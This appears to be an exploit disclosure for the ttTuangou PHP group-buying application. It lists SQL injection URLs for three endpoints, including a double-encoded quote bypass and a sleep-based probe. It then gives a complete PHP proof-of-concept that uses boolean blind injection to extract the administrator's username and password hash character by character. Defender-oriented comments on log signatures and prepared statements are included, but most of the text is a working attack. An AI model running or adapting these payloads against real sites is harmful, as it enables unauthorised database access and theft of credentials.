\modules\ajax\check.mod.php 40 or 63 ::: urldecode -->' bypass gpc
http://localhost/ttTuangou/ajax.php?mod=check&code=email&email=%2527 or 1=2%23
\modules\index.mod.php 542
http://localhost/ttTuangou/?mod=index&code=expressconfirm&id=0 or if(1,sleep(3),1) or 1=2%23
\modules\index.mod.php 189
http://localhost/ttTuangou/?mod=index&code=order&orderid=0 or 1=1%23
<?php
// Proof-of-concept for the boolean-based blind SQL injection noted above
// (ajax.php?mod=check&code=email). It reads one character at a time from
// `cenwor_system_members` (uid=1) by asking yes/no questions through
// http_send() and binary-searching the ASCII value.
//
// Defender's view: this script never sees the data directly; it only sees
// whether the probe made the check endpoint answer "1". The access log of
// the target therefore shows a burst of requests to
// `ajax.php?mod=check&code=email` whose `email` parameter carries `%2527`
// followed by SQL (`SELECT`, `length(`, `ascii(mid(`) — roughly seven
// requests per recovered character. The server-side fix is to bind the
// value with a prepared statement instead of relying on GPC escaping that
// is undone by a later urldecode (see the note at the top of this page).

// No runtime cap (hundreds of HTTP probes) and all warnings suppressed —
// this also hides the undefined `$data` notice inside http_send().
set_time_limit(0);error_reporting(0);
echo " by k4shifz\n http://bbs.wolvez.org\n";
$host='localhost';     // target host, read by http_send() via `global`
$path='tttuangou';     // application path under the web root
$length=$name=$pass=$t1=$t2=$low=$high=$mid='';
/*********************Start*************************/
$t1=time();
// Step 1: username length. Mode 0 compares length(username) for equality
// with 1..29; the first probe that answers "1" fixes $length.
for($v=1;$v<30;$v++)
{
if(http_send(0,0,'='.$v))
{
$length=$v;break;
}
}
// No length found: either not vulnerable or the table prefix is not `cenwor_`
// (the prefix is hard-coded in http_send()).
if(!$length) exit("\nFailed , Maybe the table prefix isn't `cenwor_`\n");
// Step 2: username characters. For each position, binary-search the ASCII
// value in the printable range 33..126 using mode 1 ('=' then '<' probes).
for($v=1;$v<($length+1);$v++)
{
for($low=33,$high=127;$low<=$high;)
{
$mid=(int)(($low+$high)/2);
if(http_send(1,$v,'='.$mid))
{
$name .= chr($mid);
break;
}
if(http_send(1,$v,'<'.$mid))
{
$high = $mid;
}
else
{
$low = $mid;
}
}
}
// Step 3: password column, 32 positions, searched in 48..102 — the range that
// covers '0'-'9' (48-57) and 'a'-'f' (97-102). That shape is consistent with a
// 32-character lowercase hex digest (e.g. MD5), but the hash algorithm itself
// is not verified anywhere in this script.
for($v=1;$v<33;$v++)
{
for($low=48,$high=103;$low<=$high;)
{
$mid=(int)(($low+$high)/2);
if(http_send(2,$v,'='.$mid))
{
$pass .= chr($mid);
break;
}
if(http_send(2,$v,'<'.$mid))
{
$high = $mid;
}
else
{
$low = $mid;
}
}
}
$t2=time();
echo "\n{$name}:{$pass}\nuse ".($t2-$t1)." s\n";
/**********************Function************************/
/**
 * Send one blind-injection probe and report the server's yes/no answer.
 *
 * @param int    $i      which subquery to build: 0 = length(username),
 *                       1 = ascii(mid(username,$n,1)), 2 = ascii(mid(password,$n,1));
 *                       any other value leaves $cmd unset
 * @param int    $n      1-based character position (ignored for mode 0)
 * @param string $ascii  comparison suffix appended verbatim, e.g. '=65' or '<65'
 * @return int           1 when the last byte of the HTTP response is '1', else 0
 *
 * Defender's view: the request places `%2527` in the `email` parameter. The
 * web server decodes that once to `%27`; the note at the top of this page
 * says the application then urldecodes again, turning it into a literal `'`
 * after any magic_quotes/GPC escaping has already run. Escaping cannot be
 * relied on once input is decoded afterwards — the durable fix is a bound
 * parameter in the query. The `%23` (`#`) comments out the rest of the
 * original statement. Probes of this form are easy to flag in access logs
 * by the `SELECT`/`ascii(mid(` substrings in a query-string parameter.
 */
function http_send($i=0,$n=1,$ascii=1)
{
global $host,$path;
switch($i)
{
case 0:
$cmd='(SELECT%20length(username)%20FROM%20cenwor_system_members%20where%20uid=1)'.$ascii;
break;
case 1:
$cmd='(SELECT%20ascii(mid(username,'.$n.',1))%20FROM%20cenwor_system_members%20where%20uid=1)'.$ascii;
break;
case 2:
$cmd='(SELECT%20ascii(mid(password,'.$n.',1))%20FROM%20cenwor_system_members%20where%20uid=1)'.$ascii;
break;
}
// Raw HTTP/1.0 over port 80; the fsockopen() result is never checked, so a
// refused connection silently falls through (errors are suppressed globally).
$fs=fsockopen($host,80);
fputs($fs,"GET /{$path}/ajax.php?mod=check&code=email&email=%2527%20or%20{$cmd}%23 HTTP/1.0\r\nUser-Agent: Mozilla/4.0\r\nHost: {$host}\r\n\r\n");
// $data is never initialised; `.=` on an undefined variable only passes
// quietly because error_reporting(0) is set by the caller.
while(!feof($fs))
$data .= fread($fs,1024);
fclose($fs);
// Oracle: the check endpoint is assumed to end its body with "1" or "0".
// Loose `==` means the string '1' compares equal to the integer 1.
if(substr($data,-1,1)==1)
return 1;
else
return 0;
}
?>